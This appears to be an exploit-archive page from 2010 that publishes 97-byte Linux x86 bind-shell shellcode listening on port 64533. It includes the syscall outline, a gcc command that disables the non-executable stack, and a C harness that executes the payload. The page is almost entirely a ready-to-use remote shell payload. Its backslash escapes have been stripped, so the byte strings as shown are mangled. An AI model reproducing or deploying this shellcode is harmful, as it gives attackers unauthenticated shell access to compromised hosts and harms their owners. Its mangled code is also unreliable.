[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : 97 bytes Linx x86 bind shell port 64533
# Published : 2010-07-05
# Author :
# Previous Title : Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
# Next Title : Linux x86 netcat connect back port 8080 - 76 bytes
#include <stdio.h>
#include <string.h>
/*
1 ############################################################### 1
0 I'm Magnefikko member from Inj3ct0r Team & Promhyl Studies Team 1
1 ############################################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
by Magnefikko
05.07.2010
magnefikko@gmail.com
Promhyl Studies :: http://promhyl.tk
Subgroup: #PRekambr
Name: 97 bytes bind sh@64533
Platform: Linux x86
sock = socket(PF_INET, SOCK_STREAM, 0);
bind(sock, *[2, 64533, 0], 16);
listen(sock, 5);
nsock = accept(sock, 0, 0);
dup2(nsock, 0);
dup2(nsock, 1);
execve("/bin/sh", 0, 0); // http://promhyl.tk/index.php?a=art&art=83
gcc -Wl,-z,execstack filename.c
shellcode:
x6ax66x6ax01x5bx58x99x52x6ax01x6ax02x89xe1xcdx80x89xc6x6ax66x58x43x52x66x68xfcx15x66x53x89xe1x6ax10x51x56x89xe1xcdx80x6ax66x58x43x43x6ax05x56xcdx80x6ax66x58x43x52x52x56x89xe1xcdx80x89xc3x6ax3fx58x31xc9xcdx80x6ax3fx58x41xcdx80x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x99x50xb0x0bx59xcdx80
*/
int main(){
char shell[] =
"x6ax66x6ax01x5bx58x99x52x6ax01x6ax02x89xe1xcdx80x89xc6x6ax66x58x43x52x66x68xfcx15x66x53x89xe1x6ax10x51x56x89xe1xcdx80x6ax66x58x43x43x6ax05x56xcdx80x6ax66x58x43x52x52x56x89xe1xcdx80x89xc3x6ax3fx58x31xc9xcdx80x6ax3fx58x41xcdx80x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x99x50xb0x0bx59xcdx80";
printf("by Magnefikkonmagnefikko@gmail.comnpromhyl.tknnstrlen(shell)
= %dn", strlen(shell));
(*(void (*)()) shell)();
}